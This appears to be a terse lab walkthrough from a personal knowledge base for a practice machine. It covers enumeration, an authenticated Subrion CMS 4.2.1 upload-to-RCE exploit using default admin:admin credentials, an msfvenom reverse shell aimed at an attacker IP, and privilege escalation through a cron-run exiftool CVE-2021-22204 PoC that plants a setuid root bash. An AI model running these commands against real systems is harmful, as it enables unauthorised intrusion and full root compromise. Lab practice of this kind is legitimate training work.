Malleum Knowledge Base

Enumeration

1 min read

Ports

  1. 22
  2. 80

HTTP

Apache httpd 2.4.41 ((Ubuntu))

Robots.txt

User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/

Found login in panel subiron4.21

└─$ searchsploit -m 49876
  Exploit: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
      URL: https://www.exploit-db.com/exploits/49876
     Path: /usr/share/exploitdb/exploits/php/webapps/49876.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
 
Copied to: /home/kali/49876.py
 
python3 49876.py -u http://exfiltrated.offsec/panel/ --user admin --pass admin
 
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.118.11 LPORT=4444 -f elf -o shell

Running lse.sh

Crontab found running exiftool

searchsploit exiftool

Poc Exiftool

sudo apt install djvulibre-bin
git clone https://github.com/UNICORDev/exploit-CVE-2021-22204.git
python exploit-CVE-2021-22204.py -c 'cp /usr/bin/bash /var/www/html/subrion/uploads/rootbash; chmod +s /var/www/html/subrion/uploads/rootbash'

wait for the cron tab

./rootbash -p

Graph View